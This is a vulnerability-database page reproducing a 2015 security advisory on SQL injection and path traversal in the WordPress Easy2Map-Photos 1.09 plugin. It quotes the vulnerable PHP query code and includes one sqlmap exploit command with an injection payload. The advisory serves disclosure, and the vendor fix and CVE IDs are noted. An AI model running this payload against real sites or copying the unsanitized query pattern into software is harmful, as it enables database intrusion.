Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormLarry W. CashdollarPACKETSTORM:132613
HistoryJul 08, 2015 - 12:00 a.m.

WordPress Easy2Map-Photos 1.09 SQL Injection

2015-07-0800:00:00
Larry W. Cashdollar
packetstormsecurity.com
22

EPSS

0.003

Percentile

66.0%

JSON
`Title: SQL Injection in easy2map-photos wordpress plugin v1.09  
Author: Larry W. Cashdollar, @_larry0  
Date: 2015-06-08  
Download Site: https://wordpress.org/plugins/easy2map-photos  
Vendor: Steven Ellis  
Vendor Notified: 2015-06-08, fixed in v1.1.0  
Vendor Contact: https://profiles.wordpress.org/stevenellis/  
Advisory: http://www.vapid.dhs.org/advisory.php?v=130  
Description: Easy2Map Photos is a simple-yet-powerful tool for generating great-looking geo-tagged photo galleries.  
Vulnerability:  
The following lines in includes/Functions.php are vulnerable to SQL injection attack because they aren’t parameterized or sanitizing user input.  
  
48 $wpdb->query(sprintf("UPDATE $mapsTable  
49 SET PolyLines = '%s'  
50 WHERE ID = '%s';", $PolyLines, $mapID));  
218 $wpdb->query(sprintf("  
219 UPDATE $mapsTable  
220 SET TemplateID = '%s',  
221 MapName = '%s',  
222 Settings = '%s',  
223 CSSValues = '%s',  
224 CSSValuesPhoto = '%s',  
225 CSSValuesMap = '%s',  
226 MapHTML = '%s',  
227 IsActive = 1  
228 WHERE ID = %s;",  
229 $_REQUEST['mapTemplateName'],  
230 $_REQUEST['mapName'],  
231 urldecode($_REQUEST['mapSettingsXML']),  
232 urldecode($_REQUEST["parentCSSXML"]),  
233 urldecode($_REQUEST["photoCSSXML"]),  
234 urldecode($_REQUEST["mapCSSXML"]),  
235 urldecode($_REQUEST["mapHTML"]), $mapID));  
  
  
238 //this is a map insert  
239 if (!$wpdb->query(sprintf("  
240 INSERT INTO $mapsTable(  
241 TemplateID,  
242 MapName,  
243 DefaultPinImage,  
244 Settings,  
245 LastInvoked,  
246 PolyLines,  
247 CSSValues,  
248 CSSValuesPhoto,  
249 CSSValuesMap,  
250 MapHTML,  
251 IsActive  
252 ) VALUES ('%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s' , 0);",  
253 $_REQUEST['mapTemplateName'],  
254 $_REQUEST['mapName’]  
  
  
331 $wpdb->query(sprintf("  
332 UPDATE $mapsTable  
333 SET MapName = '%s'  
334 IsActive = 1  
335 WHERE ID = %s;",  
336 $_REQUEST['mapName'],  
337 $mapID));  
  
Also  
  
In MapPinImageUpload.php and MapPinIconSave.php this code would allow someone to create files outside of the intended upload directory by adding ../../../../ path traversal characters:  
  
if (!file_exists($imagesDirectory)) {  
mkdir($imagesDirectory);  
}  
  
CVEID: 2015-4615 2015-4617  
OSVDB:  
Exploit Code:  
β€’ $ sqlmap -u 'http://wp.site:80/wp-admin/admin-ajax.php' --data="mapID=11&mapName='+or+1%3D%3D1%3B&action=e2m_img_save_map_name" --cookie=COOKIE HERE --level=5 --risk=3  
`

Related

wpvulndb 1
wpexploit 1
cve 2
cvelist 2
prion 2
nvd 2
securityvulns 1
wpvulndb
wpvulndb
Easy2Map Photos <= 1.0.9 - SQL Injection
2015-06-08 00:00:00
wpexploit
wpexploit
Easy2Map Photos <= 1.0.9 - SQL Injection
2015-06-08 00:00:00
cve
cve
CVE-2015-4615
2019-02-15 21:29:00
CVE-2015-4617
2019-02-15 21:29:00
cvelist
cvelist
CVE-2015-4615
2019-02-15 21:00:00
CVE-2015-4617
2019-02-15 21:00:00
prion
prion
Sql injection
2019-02-15 21:29:00
Path traversal
2019-02-15 21:29:00
nvd
nvd
CVE-2015-4617
2019-02-15 21:29:00
CVE-2015-4615
2019-02-15 21:29:00
securityvulns
securityvulns
Web applications security vulnerabilities summary &#40;PHP, ASP, JSP, CGI, Perl&#41;
2015-07-14 00:00:00

EPSS

0.003

Percentile

66.0%

JSON
Related for PACKETSTORM:132613
wpvulndb1wpexploit1cve2cvelist2prion2nvd2securityvulns1